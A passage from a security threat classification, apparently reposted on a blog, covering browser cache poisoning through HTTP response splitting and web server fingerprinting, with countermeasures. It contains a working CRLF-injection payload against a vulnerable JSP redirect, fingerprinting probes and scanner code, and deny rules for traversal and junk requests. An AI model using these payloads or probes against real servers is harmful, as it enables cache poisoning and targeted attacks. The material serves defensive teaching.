_ Browser cache poisoning: This is a special case of "Web Cache
Poisoning" (verified on IE 6.0). It is somewhat similar to XSS in the sense
that in both the attacker needs to target individual clients. However, unlike
XSS, it has a long lasting effect because the spoofed resource remains in
the browser's cache.

Example
Consider the following JSP page (let's assume it is located in /redir_lang.jsp):

<%
response.sendRedirect("/by_lang.jsp?lang="+
request.getParameter("lang"));
%>

When invoking /redir_lang.jsp with a parameter lang=English, it will redirect to
/by_lang.jsp?lang=English. A typical response is as follows (the web server is
BEA WebLogic 8.1 SP1 - see section "Lab Environment" in [1] for exact details
for this server):

HTTP/1.1 302 Moved Temporarily
Date: Wed, 24 Dec 2003 12:53:28 GMT
Location: http://10.1.1.1/by_lang.jsp?lang=English
Server: WebLogic XMLX Module 8.1 SP1 Fri Jun 20 23:06:40 PDT 2003
271009 with
Content-Type: text/html
Set-Cookie:
JSESSIONID=1pMRZOiOQzZiE6Y6iivsREg82pq9Bo1ape7h4YoHZ62RXj
ApqwBE!-1251019693; path=/
Connection: Close


<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a
href="http://10.1.1.1/by_lang.jsp?lang=English">http://10.1.1.1/by_lang.jsp?lan
g=English</a>.</p>
</body></html>

As can be seen, the lang parameter is embedded in the Location response
header.
Now, we move on to mounting an HTTP Response Splitting attack. Instead of
sending the value English, we send a value, which makes use of URL-encoded
CRLF sequences to terminate the current response, and shape an additional
one. Here is how this is done:

/redir_lang.jsp?lang=foobar%0d%0aContent-
Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-
Type:%20text/html%0d%0aContent-
Length:%2019%0d%0a%0d%0a<html>Shazam</html>

This results in the following output stream, sent by the web server
over the TCP connection:

HTTP/1.1 302 Moved Temporarily
Date: Wed, 24 Dec 2003 15:26:41 GMT
Location: http://10.1.1.1/by_lang.jsp?lang=foobar
Content-Length: 0

HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 19

<html>Shazam</html>
Server: WebLogic XMLX Module 8.1 SP1 Fri Jun 20 23:06:40 PDT 2003
271009 with
Content-Type: text/html
Set-Cookie:
JSESSIONID=1pwxbgHwzeaIIFyaksxqsq92Z0VULcQUcAanfK7In7IyrCST
9UsS!-1251019693; path=/
[...]

Explanation: this TCP stream will be parsed by the target as follows:
A first HTTP response, which is a 302 (redirection) response. This response is
colored blue.
A second HTTP response, which is a 200 response, with a content
comprising of 19 bytes of HTML. This response is colored red.
Superfluous data - everything beyond the end of the second response is
superfluous, and does not conform to the HTTP standard.

So when the attacker feeds the target with two requests, the first being to the
URL

/redir_lang.jsp?lang=foobar%0d%0aContent-
Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-
Type:%20text/html%0d%0aContent-
Length:%2019%0d%0a%0d%0a<html>Shazam</html>

And the second to the URL

/index.html

The target would believe that the first request is matched to the first response:

HTTP/1.1 302 Moved Temporarily
Date: Wed, 24 Dec 2003 15:26:41 GMT
Location: http://10.1.1.1/by_lang.jsp?lang=foobar
Content-Length: 0

And that the second request (to /index.html) is matched to the second
response:

HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 19

<html>Shazam</html>

And by this, the attacker manages to fool the target.

Now, this particular example is quite na븎e, as is explained in [1]. It doesn't take
into account some problems with how targets parse the TCP stream, issues with
the superfluous data, problems with the data injection, and how to force caching.
This (and more) is discussed in [1], under the "practical consideration" sections.


Solution
Validate input. Remove CRs and LFs (and all other hazardous
characters) before embedding data into any HTTP response headers,
particularly when setting cookies and redirecting. It is possible to use
third party products to defend against CR/LF injection, and to test for
existence of such security holes before application deployment.
Further recommendations are:
Make sure you use the most up to date application engine
Make sure that your application is accessed through a unique IP address (i.e.
that the same IP address is not used for another application, as it is with virtual
hosting).

References
[1] "Divide and Conquer - HTTP Response Splitting, Web Cache Poisoning Attacks, and Related Topics" by Amit Klein,
http://www.sanctuminc.com/pdf/whitepaper_httpresponse.pdf

[2] "CRLF Injection" by Ulf Harnhammar (BugTraq posting),
http://www.securityfocus.com/archive/1/271515






1.2 Web Server/Application Fingerprinting
Web server/application fingerprinting is similar to its predecessor, TCP/IP
Fingerprinting (with today's favorite scanner - Nmap) except that it is focused on
the Application Layer of the OSI model instead of the Transport Layer.  The
theory behind web server/application fingerprinting is to create an accurate
profile of the target's software, configurations and possibly even their network
architecture/topology by analyzing the following:

_ Implementation differences of the HTTP Protocol
_ HTTP Response Headers
_ File Extensions (.asp vs. jsp)
_ Cookies (ASPSESSION)
_ Error Pages (Default?)
_ Directory Structures and Naming Conventions (Windows/Unix)
_ Web Developer Interfaces (Frontpage/WebPublisher)
_ Web Administrator Interfaces (iPlanet/Comanche)
_ OS Fingerprinting Mismatches (IIS on Linux?)

The normal SOP for attackers is to footprint the target's web presence and
enumerate as much information as possible.  With this information, the attacker
may develop an accurate attack scenario, which will effectively exploit a
vulnerability in the software type/version being utilized by the target host. 

Accurately identifying this information for possible attack vectors is vitally
importantly since many security vulnerabilities (such as buffer overflows, etc...)
are extremely dependent on a specific software vendor and version numbers. 
Additionally, correctly identifying the software versions and choosing an
appropriate exploit reduces the overall "noise" of the attack while increasing its
effectiveness.  It is for this reason that a web server/application, which obviously
identifies itself, is inviting trouble.

In fact, the HTTP RFC 2068 discusses this exact issue and urges web
administrators to take steps to hide the version of software being displayed by
the "Server" response header:

"Note: Revealing the specific software version of the server may allow the
server machine to become more vulnerable to attacks against software that
is known to contain security holes. Server implementers are encouraged to
make this field a configurable option."


Due to the fact that it is possible to infer the type and version of web
server/application that is being used by a target by correlating information
gathering by other Information Disclosure categories, we will focus only on the
HTTP Protocol implementation analyzation that today's web fingerprinting tools
utilize.


Examples:
All of the examples below demonstrate analysis techniques of the composition
and interpretation of HTTP requests by the target web servers.

Implementation differences of the HTTP Protocol
Lexical - The lexical characteristics category covers variations in the actual
words/phrases used, capitalization and punctuation displayed by the HTTP
Response Headers. 

_ Response Code Message - The error code 404, Apache reports "Not
Found" whereas Microsoft IIS/5.0 reports "Object Not Found".

Apache 1.3.29 - 404
Microsoft-IIS/4.0 - 404
# telnet target1.com 80
Trying target1.com...
Connected to target1.com.
Escape character is '^]'.
HEAD /non-existent-file.txt HTTP/1.0

HTTP/1.1 404 Not Found
Date: Mon, 07 Jun 2004 14:31:03 GMT
Server: Apache/1.3.29 (Unix)
mod_perl/1.29
Connection: close
Content-Type: text/html; charset=iso-
8859-1

Connection closed by foreign host.

# telnet target2.com 80
Trying target2.com...
Connected to target2.com.
Escape character is '^]'.
HEAD /non-existent-file.txt HTTP/1.0

HTTP/1.1 404 Object Not Found
Server: Microsoft-IIS/4.0
Date: Mon, 07 Jun 2004 14:41:22 GMT
Content-Length: 461
Content-Type: text/html

Connection closed by foreign host.

_ Header Wording - The header "Content-Length" is returned vs. "Content-
length".

Netscape-Enterprise/6.0 - HEAD
Microsoft-IIS/4.0 - HEAD
# telnet target1.com 80
Trying target1.com...
Connected to target1.com.
Escape character is '^]'.
HEAD / HTTP/1.0

HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Date: Mon, 07 Jun 2004 14:55:25 GMT
Content-length: 26248
Content-type: text/html
Accept-ranges: bytes

Connection closed by foreign host.
# telnet target2.com 80
Trying target2.com...
Connected to target2.com.
Escape character is '^]'.
HEAD / HTTP/1.0

HTTP/1.1 404 Object Not Found
Server: Microsoft-IIS/4.0
Date: Mon, 07 Jun 2004 15:22:54 GMT
Content-Length: 461
Content-Type: text/html

Connection closed by foreign host.


Syntactic - Per the HTTP RFC, all web communications are required to have a
predefined structure and composition so that both parties can understand each
other.  Variations in the HTTP Response header ordering and format still exist.

_ Header Ordering - Apache servers consistently place the "Date" header
before the "Server" header while Microsoft-IIS has these headers in the
reverse order.

Apache 1.3.29- HEAD
Microsoft-IIS/4.0 - HEAD
# telnet target1.com 80
Trying target1.com...
Connected to target1.com.
Escape character is '^]'.
HEAD / HTTP/1.0

HTTP/1.1 200 OK
Date: Mon, 07 Jun 2004 15:21:24 GMT
Server: Apache/1.3.29 (Unix)
mod_perl/1.29
Content-Location: index.html.en
Vary: negotiate,accept-language,accept-
charset
TCN: choice
Last-Modified: Fri, 04 May 2001 00:00:38
GMT
ETag: "4de14-5b0-3af1f126;40a4ed5d"
Accept-Ranges: bytes
Content-Length: 1456
Connection: close
Content-Type: text/html
Content-Language: en
Expires: Mon, 07 Jun 2004 15:21:24 GMT

Connection closed by foreign host.
# telnet target2.com 80
Trying target2.com...
Connected to target2.com.
Escape character is '^]'.
HEAD / HTTP/1.0

HTTP/1.1 404 Object Not Found
Server: Microsoft-IIS/4.0
Date: Mon, 07 Jun 2004 15:22:54 GMT
Content-Length: 461
Content-Type: text/html

Connection closed by foreign host.

_ List Ordering - When an OPTIONS method is sent in an HTTP Request, a
list of allowed methods for the given URI are returned in an "Allow" header. 
Apache only returns the "Allow: header, while IIS also includes a "Public"
header.

Apache 1.3.29- OPTIONS
Microsoft-IIS/5.0 - OPTIONS
# telnet target1.com 80
Trying target1.com...
Connected to target1.com.
Escape character is '^]'.
OPTIONS * HTTP/1.0

HTTP/1.1 200 OK
Date: Mon, 07 Jun 2004 16:21:58 GMT
Server: Apache/1.3.29 (Unix)
mod_perl/1.29
Content-Length: 0
Allow: GET, HEAD, OPTIONS, TRACE
Connection: close

Connection closed by foreign host.
# telnet target2.com 80
Trying target2.com...
Connected to target2.com.
Escape character is '^]'.
OPTIONS * HTTP/1.0

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 7 Jun 2004 12:21:38 GMT
Content-Length: 0
Accept-Ranges: bytes
DASL: <DAV:sql>
DAV: 1, 2
Public: OPTIONS, TRACE, GET, HEAD,
DELETE, PUT, POST, COPY, MOVE, MKCOL,
PROPFIND, PROPPATCH, LOCK, UNLOCK,
SEARCH
Allow: OPTIONS, TRACE, GET, HEAD,
DELETE, PUT, POST, COPY, MOVE, MKCOL,
PROPFIND, PROPPATCH, LOCK, UNLOCK,
SEARCH
Cache-Control: private

Connection closed by foreign host.


Semantic - Besides the words and phrases that are returned in the HTTP
Response, there are obvious differences in how web servers interpret both well-
formed and abnormal/noncompliant requests.

_ Presence of Specific Headers - A server has a choice of headers to include
in a Response. While some headers are required by the specification, most
headers (e.g. ETag) are optional.   In the examples below, the Apache
servers response headers include additional entries such as: ETag, Vary and
Expires while the IIS server does not.

Apache 1.3.29- HEAD
Microsoft-IIS/4.0 - HEAD
# telnet target1.com 80
Trying target1.com...
Connected to target1.com.
Escape character is '^]'.
HEAD / HTTP/1.0

HTTP/1.1 200 OK
Date: Mon, 07 Jun 2004 15:21:24 GMT
Server: Apache/1.3.29 (Unix)
mod_perl/1.29
Content-Location: index.html.en
Vary: negotiate,accept-language,accept-
charset
TCN: choice
Last-Modified: Fri, 04 May 2001 00:00:38
GMT
ETag: "4de14-5b0-3af1f126;40a4ed5d"
Accept-Ranges: bytes
Content-Length: 1456
Connection: close
Content-Type: text/html
Content-Language: en
Expires: Mon, 07 Jun 2004 15:21:24 GMT

Connection closed by foreign host.
# telnet target2.com 80
Trying target2.com...
Connected to target2.com.
Escape character is '^]'.
HEAD / HTTP/1.0

HTTP/1.1 404 Object Not Found
Server: Microsoft-IIS/4.0
Date: Mon, 07 Jun 2004 15:22:54 GMT
Content-Length: 461
Content-Type: text/html

Connection closed by foreign host.

Response Codes for Abnormal Requests - Even though the same requests
are made to the target web servers, it is possible to interpretation of the request
to be different and therefore different response codes generated.  A perfect
example of this semantic difference in interpretation is the "Light Fingerprinting"
check which the Whisker scanner utilizes.  The section of Perl code below, taken
from Whisker 2.1's main.test file, runs two tests to determine if the target web
server is in fact an Apache server, regardless of what the Banner might report. 
The first request is a "GET //" and if the HTTP Status Code is a 200, then the
next request is sent.  The second request is "GET/%2f", which is URI Encoded -
and translates to "GET //".  This time Apache returns a 404 - Not Found error
code.  Other web servers - IIS - do not return the same status codes for these
requests.

# now do some light fingerprinting...
        -- CUT --       
        my $Aflag=0;
        $req{whisker}->{uri}='//';
        if(!_do_request(\%req,\%G_RESP)){
                _d_response(\%G_RESP);
                if($G_RESP{whisker}->{code}==200){
                        $req{whisker}->{uri}='/%2f';
                        if(!_do_request(\%req,\%G_RESP)){
                                _d_response(\%G_RESP);
                                $Aflag++ if($G_RESP{whisker}-
>{code}==404);
        }       }       }
       
        m_re_banner('Apache',$Aflag);


After running Whisker against a target website, it reports, based on the pre-tests
that the web server may in fact be an Apache server.   Below is the example
Whisker report section:

-----------------------------------------------------------------------
Title: Server banner
Id: 100
Severity: Informational
The server returned the following banner:
Microsoft-IIS/4.0
-----------------------------------------------------------------------
Title: Alternate server type
Id: 103
Severity: Informational
Testing has identified the server might be an 'Apache' server. This
Change could be due to the server not correctly identifying itself (the
Admins changed the banner).  Tests will now check for this server type
as well as the previously identified server types.
-----------------------------------------------------------------------




Not only does this alert the attacker that the web server administrators are savvy
enough to alter the Server banner info, but Whisker will also add in all of the
Apache tests to its scan which would increase its accuracy.

Solutions: 
It is not possible to remove every single identifying piece of information provided
by your web server.  The fact is that a determined attack will be able to identify
your web server software.  Your goal should be to raise the bar of
reconnaissance to a height that will cause the attacker to probe hard enough that
they will most likely trigger a security alert.  The steps below will aid in this task. 
The solutions are listed in order from easiest to implement to the most complex.

Alter the Server Banner Information
It is possible to edit out and/or alter (for deception purposes) the "Server" field
information displayed by a web server's response headers.  There has been
much debate in web security circles as to the amount of protection that can be
gained by changing the HTTP Server: token information.  While altering the
banner info alone, and not taking any other steps to hide the software version,
probably doesn't provide much protection from REAL people who are actively
conducting reconnaissance, it does help with regards to blocking automated
WORM programs.  Due to the increase in popularity of using worms to mass
infect systems; this method of protecting your web servers becomes vital.  This
step could certainly buy organizations some time during the patching phase
when new worms are released into the wild and they are configured to attack
systems based on the server token response.

Apache Servers - ModSecurity has the SecServerSignature setting, which
allows the web admin to set the Server banner info from within the httpd.conf file
instead of editing the Apache source code prior to compilation.

IIS Servers - By installing the IISLockDown and URLScan tools, you can update
the banner info returned to clients.

Minimize the Verboseness of Information in Headers
Restrict the amount of information returned in the response headers.  For
instance, Apache allows the administrator to control the verboseness of the
Server banner token by editing the ServerTokens directive:

ServerTokens Prod[uctOnly]
Server sends (e.g.): Server: Apache
ServerTokens Min[imal]
Server sends (e.g.): Server: Apache/1.3.0
ServerTokens OS
Server sends (e.g.): Server: Apache/1.3.0 (Unix)
ServerTokens Full (or not specified)
Server sends (e.g.): Server: Apache/1.3.0 (Unix) PHP/3.0 MyMod/1.2

By minimizing the headers, you may hide information such as additional apache
modules that are installed.


Implement Fake Headers
An alternate technique for defeating/confusing web server fingerprinting is to
present a fake web topology.  Attackers usually include Banner Grabbing
sessions as part of the overall Footprinting Process.  During Footprinting, the
attacker is trying to gauge the target's enterprise architecture.  By adding in
additional fake headers, we can simulate a complex web environment (I.E.-
DMZ).  By adding additional headers to simulate the existence of a reverse proxy
server, we can create the "appearance" of a complex architecture. 

For Apache servers, we can add the following httpd.conf entry to accomplish this
task:
_ Header set Via "1.1 squid.proxy.companyx.com (Squid/2.4.STABLE6)"
_ ErrorHeader set Via "1.1 squid.proxy.companyx.com
(Squid/2.4.STABLE6)"
_ Header set X-Cache "MISS from www.nonexistenthost.com"
_ ErrorHeader set X-Cache "MISS from www.nonexistenthost.com"
 
These entries add the "Via" and X-Cache HTTP response headers to all
responses as shown below:

# telnet localhost 80
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
HEAD / HTTP/1.0

HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Date: Sun, 30 Mar 2003 21:59:46 GMT
Content-Location: index.html.en
Vary: negotiate,accept-language,accept-charset
TCN: choice
Via: 1.1 squid.proxy.companyx.com (Squid/2.4.STABLE6)
X-Cache: MISS from www.nonexistenthost.com
Content-Length: 2673
Connection: close

This gives the illusion that we are using a Squid Proxy server and are presenting
web data from a non-existent server.  This might entice the attacker into either
launching Squid Exploits against our Apache server, which would of course be
unsuccessful or to attack the host specified in the X-Cache header with does not
actually exist.

Install Third Party Web Security Tools
By installing additional web security applications or tools, such as ModSecurity or
ServerMask, it is possible to either disrupt or total defeat today's web server
fingerprinting applications such as HTTPrint.  As described in the example
sections above, these tools will probe target web servers with many different
requests to try and initiate a specific response.  Below are some of the abnormal
requests which HTTPrint sends to the web server: 

192.168.139.101 - - [08/Jun/2004:11:21:40 -0400] "JUNKMETHOD / HTTP/1.0" 501
344 "-" "-"
192.168.139.101 - - [08/Jun/2004:11:21:40 -0400] "GET / JUNK/1.0" 400 381 "-"
"-"
192.168.139.101 - - [08/Jun/2004:11:21:40 -0400] "get / HTTP/1.0" 501 330 "-"
"-"
192.168.139.101 - - [08/Jun/2004:11:21:40 -0400] "GET / HTTP/0.8" 200 1456 "-"
"-"
192.168.139.101 - - [08/Jun/2004:11:21:40 -0400] "GET / HTTP/1.2" 200 1456 "-"
"-"
192.168.139.101 - - [08/Jun/2004:11:21:40 -0400] "GET / HTTP/3.0" 200 1456 "-"
"-"
192.168.139.101 - - [08/Jun/2004:11:21:40 -0400] "GET /../../ HTTP/1.0" 400 344
"-" "-"

If we implement a tool such as ModSecurity for Apache servers, we can create
HTTP RFC compliant filters, which will trigger on these abnormal requests. 
Here are some ModSecurity httpd.conf entries, which may be used:

# This will return a 403 - Forbidden Status Code for all Mod_Security actions
SecFilterDefaultAction "deny,log,status:403"

# This will deny directory traversals
SecFilter "\.\./"

# This entry forces compliance of the request method.  Any requests that do NOT
# start with either GET|HEAD|POST will be denied.  This will catch/trigger on
# junk methods.
SecFilterSelective THE_REQUEST "!^(GET|HEAD|POST)"

# This entry will force HTTP compliance to the end portion of the request.  If
# the request does NOT end with a valid HTTP version, then it will be denied.
SecFilterSelective THE_REQUEST "!HTTP\/(0\.9|1\.0|1\.1)$"


Source Code Editing
This is the most complex task for fingerprinting countermeasures, however it is
the most effective.  The risk vs. reward for this task could vary greatly depending
on your skill level of programming or your web architecture.  Generally speaking,
this task includes editing the source code of the web server either prior to
compilation or with the actual binary using a binary editor.  For open source web
servers such as Apache, the task is much easier since you have access to the
code. 

Header Ordering - Below is a source code patch for the Apache 1.3.29 server
that will correct the DATE/SERVER order and also mimic the IIS OPTIONS
output data.  This patch updates the http_protocol.c file in the
/apache_1.3.29/src/main directory.  The OPTIONS section will return headers
which are normally associated with IIS response tokens. These include the
Public, DASL, DAV and Cache-Control headers.

--- http_protocol.c.orig        Mon Apr 26 02:11:58 2004
+++ http_protocol.c     Mon Apr 26 02:43:31 2004
@@ -1597,9 +1597,6 @@
     /* output the HTTP/1.x Status-Line */
     ap_rvputs(r, protocol, " ", r->status_line, CRLF, NULL);

-    /* output the date header */
-    ap_send_header_field(r, "Date", ap_gm_timestr_822(r->pool, r-
>request_time));
-
     /* keep the set-by-proxy server header, otherwise
      * generate a new server header */
     if (r->proxyreq) {
@@ -1612,6 +1609,9 @@
         ap_send_header_field(r, "Server", ap_get_server_version());
     }

+    /* output the date header */
+    ap_send_header_field(r, "Date", ap_gm_timestr_822(r->pool, r-
>request_time));
+
     /* unset so we don't send them again */
     ap_table_unset(r->headers_out, "Date");        /* Avoid bogosity */
     ap_table_unset(r->headers_out, "Server");
@@ -1716,7 +1716,9 @@
     ap_basic_http_header(r);

     ap_table_setn(r->headers_out, "Content-Length", "0");
+    ap_table_setn(r->headers_out, "Public", "OPTIONS, TRACE, GET, HEAD,
DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK,
SEARCH");
     ap_table_setn(r->headers_out, "Allow", make_allow(r));
+    ap_table_setn(r->headers_out, "Cache-Control", "private");
     ap_set_keepalive(r);

     ap_table_do((int (*) (void *, const char *, const char *))
ap_send_header_field,



Reference:
"An Introduction to HTTP fingerprinting"
http://net-square.com/httprint/httprint_paper.html

"Hypertext Transfer Protocol -- HTTP/1.1"
http://www.cis.ohio-state.edu/cgi-bin/rfc/rfc2068.html#sec-14.39

"HMAP: A Technique and Tool for Remote Identification of HTTP Servers"
http://seclab.cs.ucdavis.edu/papers/hmap-thesis.pdf

"Identifying Web Servers: A first-look into Web Server Fingerprinting"
http://www.blackhat.com/presentations/bh-asia-02/bh-asia-02-grossman.pdf

"Mask Your Web Server for Enhanced Security"
http://www.port80software.com/support/articles/maskyourwebserver

"Web Intrusion Detection and Prevention"
http://www.modsecurity.org

"IIS LockDown Tool 2.1"
http://www.microsoft.com/downloads/details.aspx?FamilyID=DDE9EFC0-BB30-
47EB-9A61-FD755D23CDEC&displaylang=en

"URLScan Tool"
http://www.microsoft.com/downloads/details.aspx?FamilyID=f4c5a724-cafa-
4e88-8c37-c9d5abed1863&DisplayLang=en

"ServerMask Tool"
http://www.port80software.com/products/servermask/






License

Terms and Conditions for Copying, Distributing, and Modifying

Items other than copying, distributing, and modifying the Content with
which this license was distributed (such as using, etc.) are outside the
scope of this license.

1. You may copy and distribute exact replicas of the OpenContent
(OC) as you receive it, in any medium, provided that you
conspicuously and appropriately publish on each copy an appropriate
copyright notice and disclaimer of warranty; keep intact all the notices
that refer to this License and to the absence of any warranty; and
give any other recipients of the OC a copy of this License along with
the OC. You may at your option charge a fee for the media and/or
handling involved in creating a unique copy of the OC for use offline,
you may at your option offer instructional support for the OC in
exchange for a fee, or you may at your option offer warranty in
exchange for a fee. You may not charge a fee for the OC itself. You
may not charge a fee for the sole service of providing access to
and/or use of the OC via a network (e.g. the Internet), whether it be
via the world wide web, FTP, or any other method.

2. You may modify your copy or copies of the OpenContent or any
portion of it, thus forming works based on the Content, and distribute
such modifications or work under the terms of Section 1 above,
provided that you also meet all of these conditions:

a) You must cause the modified content to carry prominent notices
stating that you changed it, the exact nature and content of the
changes, and the date of any change.

b) You must cause any work that you distribute or publish, that in
whole or in part contains or is derived from the OC or any part
thereof, to be licensed as a whole at no charge to all third parties
under the terms of this License, unless otherwise permitted under
applicable Fair Use law.

These requirements apply to the modified work as a whole. If
identifiable sections of that work are not derived from the OC, and
can be reasonably considered independent and separate works in
themselves, then this License, and its terms, do not apply to those
sections when you distribute them as separate works. But when you
distribute the same sections as part of a whole which is a work based
on the OC, the distribution of the whole must be on the terms of this
License, whose permissions for other licensees extend to the entire
whole, and thus to each and every part regardless of who wrote it.
Exceptions are made to this requirement to release modified works
free of charge under this license only in compliance with Fair Use law
where applicable.

3. You are not required to accept this License, since you have not
signed it. However, nothing else grants you permission to copy,
distribute or modify the OC. These actions are prohibited by law if you
do not accept this License. Therefore, by distributing or translating
the OC, or by deriving works herefrom, you indicate your acceptance
of this License to do so, and all its terms and conditions for copying,
distributing or translating the OC.

NO WARRANTY

4. BECAUSE THE OPENCONTENT (OC) IS LICENSED FREE OF
CHARGE, THERE IS NO WARRANTY FOR THE OC, TO THE
EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN
OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS
AND/OR OTHER PARTIES PROVIDE THE OC "AS IS" WITHOUT
WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED,
INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
PURPOSE. THE ENTIRE RISK OF USE OF THE OC IS WITH YOU.
SHOULD THE OC PROVE FAULTY, INACCURATE, OR
OTHERWISE UNACCEPTABLE YOU ASSUME THE COST OF ALL
NECESSARY REPAIR OR CORRECTION.

5. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR
AGREED TO IN WRITING WILL ANY COPYRIGHT HOLDER, OR
ANY OTHER PARTY WHO MAY MIRROR AND/OR REDISTRIBUTE
THE OC AS PERMITTED ABOVE, BE LIABLE TO YOU FOR
DAMAGES, INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL
OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OR
INABILITY TO USE THE OC, EVEN IF SUCH HOLDER OR OTHER
PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH
DAMAGES.


Copyright 2004, Web Application Security Consortium. All rights reserved.

'IT > Security' 카테고리의 다른 글

KISA 작성 IPTV 보안관련 자료 모음  (0) 2011.11.29
개인정보의 기술적/관리적 보호조치 기준  (0) 2009.09.07
무선랜 도입시 주의해야할 점  (0) 2008.07.08
국가코드  (2) 2008.07.08